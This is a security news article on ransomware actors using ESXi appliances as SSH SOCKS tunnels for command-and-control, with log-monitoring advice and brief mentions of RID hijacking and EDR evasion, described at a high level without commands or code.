Cybersecurity analysts have recently highlighted a concerning trend in ransomware attacks targeting ESXi systems. These attacks are not only compromising virtual infrastructure but also utilizing these systems as conduits for command-and-control (C2) traffic, effectively evading detection and establishing persistent access within corporate networks.
Ransomware exploitation of ESXi systems
According to a report from Sygnia researchers Zhongyuan Hau and Ren Jie Yow, threat actors are increasingly exploiting unmonitored ESXi appliances as a means to maintain access and facilitate lateral movement within networks. By employing “living-off-the-land” tactics, attackers utilize native tools like SSH to create SOCKS tunnels between their C2 servers and the compromised environments. This method allows them to blend malicious traffic with legitimate network activity, significantly reducing the likelihood of detection by existing security measures1.
Compromise techniques
The report indicates that attackers typically gain access through compromised admin credentials or by exploiting known vulnerabilities in ESXi systems. Once inside, they establish a semi-persistent backdoor via SSH tunneling, taking advantage of the resilience of ESXi appliances, which are less likely to be shut down unexpectedly. This approach not only facilitates long-term persistence but also complicates incident response efforts due to the challenges associated with monitoring logs from these systems1.
Recommendations for detection
To combat these sophisticated attacks, organizations are advised to closely monitor specific log files on their ESXi appliances:
- /var/log/shell.log: Records shell activity.
- /var/log/hostd.log: Contains logs from the host agent.
- /var/log/auth.log: Tracks authentication events.
- /var/log/vobd.log: Logs from the VMware observer daemon.
By configuring log forwarding and analyzing these logs, security teams can enhance their ability to detect unauthorized SSH tunneling activities1.
Related threats: RID Hijacking
In a parallel development, the North Korea-linked Andariel group has been employing a technique known as Relative Identifier (RID) hijacking. This method allows attackers to covertly escalate privileges by modifying the Windows Registry, enabling low-privileged accounts to gain administrative permissions during subsequent logins. Such tactics exploit the lack of scrutiny applied to standard accounts compared to administrator accounts, facilitating undetected malicious actions1.
Advanced evasion techniques
Additionally, researchers have uncovered new methods for evading Endpoint Detection and Response (EDR) systems. By leveraging hardware breakpoints and native Windows functions like NtContinue, attackers can manipulate telemetry without triggering Event Tracing for Windows (ETW) logging. This capability allows them to execute stealthy operations while circumventing traditional security measures designed to flag suspicious activity